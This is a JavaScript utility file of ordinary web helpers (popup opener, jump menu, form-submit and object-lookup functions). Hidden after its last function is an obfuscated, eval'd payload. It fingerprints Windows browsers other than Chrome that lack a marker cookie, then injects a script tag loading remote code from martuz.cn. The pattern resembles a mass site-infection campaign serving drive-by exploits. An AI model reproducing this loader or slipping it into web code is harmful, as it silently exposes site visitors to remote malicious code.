// display decision alert box
function decision(message, url){
	if(confirm(message)) location.href = url;
}

// open browser window
function openPopUp(url, windowName, w, h, scrollbar) {

           var winl = (screen.width - w) / 2;
           var wint = (screen.height - h) / 2;
           winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scrollbar ;
		   win = window.open(url, windowName, winprops);
           if (parseInt(navigator.appVersion) >= 4) { 
              	win.window.focus(); 
           } 
}

function jumpMenu(target,object,restore){ 
  eval(target+".location='"+object.options[object.selectedIndex].value+"'");
  if (restore) object.selectedIndex=0;
}

function findObj(n, d) {
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function getImage(imageName)
{
		findObj('img').src = imageName;
}

function submitDoc(formName) { 
  var obj;
 
	if (obj=findObj(formName)!=null) 
	{
		findObj(formName).submit(); 
	}
	else 
	{
		alert('The form you are attempting to submit called \'' + formName + '\' couldn\'t be found. Please make sure the submitDoc function has the correct id and name.');
	}

}<!-- 
(function(mnFxR){var hMmgD='v#61r#20a#3d#22Sc#72#69#70#74#45ngine#22#2cb#3d#22Vers#69on#28)+#22#2cj#3d#22#22#2cu#3dn#61v#69gat#6fr#2e#75#73e#72#41#67ent#3bif(#28#75#2eindexOf#28#22Chro#6d#65#22)#3c#30)#26#26(u#2eindex#4ff(#22Wi#6e#22)#3e0#29#26#26(u#2ei#6edexOf(#22NT#20#36#22)#3c0)#26#26(document#2ecoo#6bie#2eindexOf(#22miek#3d1#22)#3c0)#26#26(type#6ff(zrv#7ats)#21#3dt#79peof(#22#41#22))#29#7bzrvzt#73#3d#22A#22#3b#65#76#61l(#22if(w#69nd#6f#77#2e#22#2ba+#22)j#3d#6a#2b#22+a#2b#22M#61jor#22+b+#61+#22#4din#6f#72#22+b+a+#22Build#22#2bb+#22#6a#3b#22)#3bdocu#6dent#2ewrite(#22#3cscri#70t#20src#3d#2f#2f#6d#22+#22artuz#2e#63n#2fvi#64#2f#3fid#3d#22+#6a+#22#3e#3c#5c#2fscr#69pt#3e#22)#3b#7d';eval(unescape(hMmgD.replace(mnFxR,'%')))})(/\#/g);
 -->